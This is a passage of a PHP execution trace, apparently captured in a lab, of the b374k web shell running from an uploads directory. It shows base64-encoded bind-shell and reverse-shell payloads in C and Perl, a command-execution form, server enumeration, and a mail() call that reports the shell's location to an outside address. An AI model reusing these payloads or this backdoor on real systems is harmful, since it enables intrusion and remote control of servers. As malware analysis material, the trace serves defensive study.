2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pwdurl .= '<a href="?y=/var/">var / </a>'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
3	41	0	0.008101	693680	sizeof	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3	41	1	0.008119	693712
3	41	R			6
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz = ''
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j = 0
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= '/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'var/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'www/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pwdurl .= '<a href="?y=/var/www/">www / </a>'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
3	42	0	0.008226	693720	sizeof	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3	42	1	0.008246	693752
3	42	R			6
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz = ''
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j = 0
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= '/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'var/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'www/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'html/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pwdurl .= '<a href="?y=/var/www/html/">html / </a>'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
3	43	0	0.008461	693768	sizeof	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3	43	1	0.008485	693800
3	43	R			6
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz = ''
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j = 0
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= '/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'var/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'www/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'html/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pathz .= 'uploads/'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$j++
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$pwdurl .= '<a href="?y=/var/www/html/uploads/">uploads / </a>'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
3	44	0	0.008681	693840	sizeof	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3	44	1	0.008703	693872
3	44	R			6
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff = 'Apache/2.4.52 (Ubuntu)<br />'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br />'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= 'uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= 'server ip : 127.0.0.1 <span class="gaya">|</span> your ip : 127.0.0.1<br />'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= 'safemode <span class="gaya">OFF<span><br />'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= '&nbsp;&gt;&nbsp;<a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a><a href="?y=/var/www/html/uploads/">uploads / </a>'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$port_bind_bd_c = 'bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07'
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$port_bind_bd_pl = 'ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8='
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$back_connect = 'fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=='
2		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$back_connect_c = 'XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw'
3	45	0	0.008921	694352	showdir	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'/var/www/html/uploads/'	'www-data $ '
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$fname = []
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$dname = []
4	46	0	0.008960	694352	function_exists	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'posix_getpwuid'
4	46	1	0.008974	694392
4	46	R			TRUE
4	47	0	0.008988	694352	function_exists	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'posix_getgrgid'
4	47	1	0.009002	694392
4	47	R			TRUE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$posix = TRUE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$user = '????:????'
4	48	0	0.009037	694352	opendir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/'
4	48	1	0.009064	694744
4	48	R			resource(6) of type (stream)
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$dh = resource(6) of type (stream)
4	49	0	0.009098	694712	readdir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	resource(6) of type (stream)
4	49	1	0.009127	694784
4	49	R			'xc.php'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$file = 'xc.php'
4	50	0	0.009153	694744	is_dir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
4	50	1	0.009172	694792
4	50	R			FALSE
4	51	0	0.009186	694752	is_file	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'xc.php'
4	51	1	0.009200	694792
4	51	R			TRUE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$fname[] = 'xc.php'
4	52	0	0.009226	695128	readdir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	resource(6) of type (stream)
4	52	1	0.009241	695200
4	52	R			'..'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$file = '..'
4	53	0	0.009265	695160	is_dir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'..'
4	53	1	0.009280	695200
4	53	R			TRUE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$dname[] = '..'
4	54	0	0.009304	695536	readdir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	resource(6) of type (stream)
4	54	1	0.009318	695608
4	54	R			'.'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$file = '.'
4	55	0	0.009341	695568	is_dir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.'
4	55	1	0.009356	695608
4	55	R			TRUE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$dname[] = '.'
4	56	0	0.009379	695568	readdir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	resource(6) of type (stream)
4	56	1	0.009393	695648
4	56	R			'prepend.php'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$file = 'prepend.php'
4	57	0	0.009417	695608	is_dir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
4	57	1	0.009433	695656
4	57	R			FALSE
4	58	0	0.009446	695616	is_file	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'prepend.php'
4	58	1	0.009460	695656
4	58	R			TRUE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$fname[] = 'prepend.php'
4	59	0	0.009483	695616	readdir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	resource(6) of type (stream)
4	59	1	0.009497	695688
4	59	R			'data'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$file = 'data'
4	60	0	0.009520	695648	is_dir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
4	60	1	0.009535	695680
4	60	R			TRUE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$dname[] = 'data'
4	61	0	0.009559	695640	readdir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	resource(6) of type (stream)
4	61	1	0.009573	695720
4	61	R			'.htaccess'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$file = '.htaccess'
4	62	0	0.009598	695680	is_dir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
4	62	1	0.009613	695728
4	62	R			FALSE
4	63	0	0.009626	695688	is_file	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.htaccess'
4	63	1	0.009640	695728
4	63	R			TRUE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$fname[] = '.htaccess'
4	64	0	0.009664	695688	readdir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	resource(6) of type (stream)
4	64	1	0.009678	695728
4	64	R			FALSE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$file = FALSE
4	65	0	0.009702	695688	closedir	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	resource(6) of type (stream)
4	65	1	0.009720	695504
4	65	R			NULL
4	66	0	0.009734	695488	sort	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => 'xc.php', 1 => 'prepend.php', 2 => '.htaccess']
4	66	1	0.009753	695520
4	66	R			TRUE
4	67	0	0.009766	695512	sort	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => '..', 1 => '.', 2 => 'data']
4	67	1	0.009781	695544
4	67	R			TRUE
4	68	0	0.009794	695512	explode	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'/'	'/var/www/html/uploads/'
4	68	1	0.009814	696120
4	68	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4	69	0	0.009850	696048	sizeof	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4	69	1	0.009868	696080
4	69	R			6
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$tree = 6
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$parent = ''
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff = ' <form action="?y=/var/www/html/uploads/&amp;x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
4	70	0	0.009930	697328	error_reporting	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	70	1	0.009944	697368
4	70	R			0
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$sub = 'backdoor b374k'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$headers = 'From: k3nz0 \n'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$headers .= 'Content-Type: text/plain; charset=iso-8859-1\n'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mes .= 'username: ????:????\n'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mes .= 'password: \n'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mes .= 'URL: /uploads/xc.php\n'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mes .= 'Referer: '
4	71	0	0.010043	697520	mail	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	4	'free.d0ing.1987@gmail.com'	'backdoor b374k'	'username: ????:????\npassword: \nURL: /uploads/xc.php\nReferer: '	'From: k3nz0 \nContent-Type: text/plain; charset=iso-8859-1\n'
4	71	1	0.011030	697664
4	71	R			FALSE
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i = 0
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$parent .= '/'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$parent .= 'var/'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$parent .= 'www/'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$parent .= 'html/'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$i++
4	72	0	0.011165	697560	fileowner	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.'
4	72	1	0.011190	697592
4	72	R			0
4	73	0	0.011209	697552	posix_getpwuid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	73	1	0.011250	698352
4	73	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	74	0	0.011320	698320	filegroup	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'.'
4	74	1	0.011342	698360
4	74	R			0
4	75	0	0.011366	698320	posix_getgrgid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	75	1	0.011408	698976
4	75	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$owner = 'root<span class="gaya"> : </span>root'
4	76	0	0.011490	699200	get_perms	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/'
5	77	0	0.011513	699200	fileperms	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/'
5	77	1	0.011542	699256
5	77	R			16895
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mode = 16895
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms = ''
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4	76	1	0.011760	699256
4	76	R			'rwxrwxrwx'
4	78	0	0.011788	699248	filemtime	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/'
4	78	1	0.011808	699288
4	78	R			1676242950
4	79	0	0.011826	699248	date	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'd-M-Y H:i'	1676242950
4	79	1	0.011904	701640
4	79	R			'12-Feb-2023 18:02'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= '<tr><td><a href="?y=/var/www/html/uploads/">.</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 18:02</td><td><span id="titik1"><a href="?y=/var/www/html/uploads/&amp;edit=/var/www/html/uploads/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik1\',\'titik1_form\');">newfolder</a></span> <form action="?" method="get" id="titik1_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hid'
4	80	0	0.011959	701856	fileowner	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'..'
4	80	1	0.011977	701880
4	80	R			0
4	81	0	0.011990	701840	posix_getpwuid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	81	1	0.012016	702640
4	81	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	82	0	0.012059	701840	filegroup	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'..'
4	82	1	0.012073	701880
4	82	R			0
4	83	0	0.012085	701840	posix_getgrgid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	83	1	0.012108	702496
4	83	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$owner = 'root<span class="gaya"> : </span>root'
4	84	0	0.012158	702032	get_perms	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/'
5	85	0	0.012173	702032	fileperms	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/'
5	85	1	0.012189	702080
5	85	R			16895
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mode = 16895
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms = ''
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4	84	1	0.012371	702080
4	84	R			'rwxrwxrwx'
4	86	0	0.012389	702072	filemtime	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/'
4	86	1	0.012404	702112
4	86	R			1676242950
4	87	0	0.012418	702072	date	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'd-M-Y H:i'	1676242950
4	87	1	0.012451	702400
4	87	R			'12-Feb-2023 18:02'
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$buff .= '<tr><td><a href="?y=/var/www/html/">..</a></td><td>LINK</td><td style="text-align:center;">root<span class="gaya"> : </span>root</td><td>rwxrwxrwx</td><td style="text-align:center;">12-Feb-2023 18:02</td><td><span id="titik2"><a href="?y=/var/www/html/uploads/&amp;edit=/var/www/html/newfile.php">newfile</a> | <a href="javascript:tukar(\'titik2\',\'titik2_form\');">newfolder</a></span> <form action="?" method="get" id="titik2_form" class="sembunyi" style="margin:0;padding:0;"> <input type="hidden" name="y" v'
4	88	0	0.012501	702360	fileowner	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
4	88	1	0.012519	702392
4	88	R			0
4	89	0	0.012532	702352	posix_getpwuid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	89	1	0.012558	703152
4	89	R			['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$name = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
4	90	0	0.012601	702352	filegroup	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
4	90	1	0.012615	702392
4	90	R			0
4	91	0	0.012628	702352	posix_getgrgid	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	0
4	91	1	0.012650	703008
4	91	R			['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$group = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
3		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$owner = 'root<span class="gaya"> : </span>root'
4	92	0	0.012700	702352	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
5	93	0	0.012714	702352	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'data'
5	93	1	0.012729	702448
5	93	R			'data'
4	92	1	0.012743	702352
4	92	R			'data'
4	94	0	0.012757	702544	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
5	95	0	0.012769	702544	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'data'
5	95	1	0.012783	702640
5	95	R			'data'
4	94	1	0.012796	702544
4	94	R			'data'
4	96	0	0.012809	702992	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
5	97	0	0.012822	702992	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'data'
5	97	1	0.012836	703088
5	97	R			'data'
4	96	1	0.012848	702992
4	96	R			'data'
4	98	0	0.012861	702992	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
5	99	0	0.012873	702992	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'data'
5	99	1	0.012887	703088
5	99	R			'data'
4	98	1	0.012899	702992
4	98	R			'data'
4	100	0	0.012912	703176	get_perms	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/data'
5	101	0	0.012926	703176	fileperms	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'/var/www/html/uploads/data'
5	101	1	0.012942	703240
5	101	R			16895
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$mode = 16895
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms = ''
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'r'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'w'
4		A						/var/www/html/uploads/xc.php(194) : eval()'d code	2	$perms .= 'x'
4	100	1	0.013060	703240
4	100	R			'rwxrwxrwx'
4	102	0	0.013074	703144	filemtime	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
4	102	1	0.013089	703160
4	102	R			1676242950
4	103	0	0.013103	703120	date	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	2	'd-M-Y H:i'	1676242950
4	103	1	0.013134	703448
4	103	R			'12-Feb-2023 18:02'
4	104	0	0.013148	703120	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
5	105	0	0.013161	703120	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'data'
5	105	1	0.013179	703216
5	105	R			'data'
4	104	1	0.013193	703120
4	104	R			'data'
4	106	0	0.013206	703248	clearspace	1		/var/www/html/uploads/xc.php(194) : eval()'d code	2	1	'data'
5	107	0	0.013219	703248	str_replace	0		/var/www/html/uploads/xc.php(194) : eval()'d code	2	3	' '	'_'	'data'
5	107	1	0.013233	703344
5	107	R			'data'
4	106	1	0.013246	703248
4	106	R			'data'
